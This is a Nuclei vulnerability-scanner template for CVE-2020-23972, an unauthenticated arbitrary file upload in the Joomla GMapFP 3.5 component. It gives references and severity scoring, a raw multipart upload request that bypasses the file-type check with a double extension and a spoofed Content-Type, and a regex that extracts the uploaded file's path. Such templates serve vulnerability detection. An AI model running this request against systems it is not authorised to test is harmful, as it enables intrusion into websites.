id: CVE-2020-23972

info:
  name: Joomla! Component GMapFP 3.5 - Arbitrary File Upload
  author: dwisiswant0
  severity: high
  description: |
    Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload. An attacker can access the upload function of the application without authentication and can upload files, because the upload restriction can be bypassed by changing the Content-Type and giving the file name a double extension.
  reference:
    - https://www.exploit-db.com/exploits/49129
    - https://raw.githubusercontent.com/me4yoursecurity/Reports/master/README.md
    - http://packetstormsecurity.com/files/159072/Joomla-GMapFP-J3.5-J3.5F-Arbitrary-File-Upload.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-23972
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-23972
    cwe-id: CWE-434
    epss-score: 0.68335
    cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5:*:*:*:-:joomla\!:*:*
  metadata:
    max-request: 2
    framework: joomla\!
    vendor: gmapfp
    product: gmapfp
  tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive

http:
  - raw:
      - |
        POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Referer: {{BaseURL}}
        Connection: close

        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="option"

        com_gmapfp
        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="image1"; filename="nuclei.html.gif"
        Content-Type: text/html

        projectdiscovery
        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="no_html"

        no_html
        ------WebKitFormBoundarySHHbUsfCoxlX1bpS--

    payloads:
      component:
        - "com_gmapfp"
        - "comgmapfp"

    extractors:
      - type: regex
        regex:
          - "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"
        part: body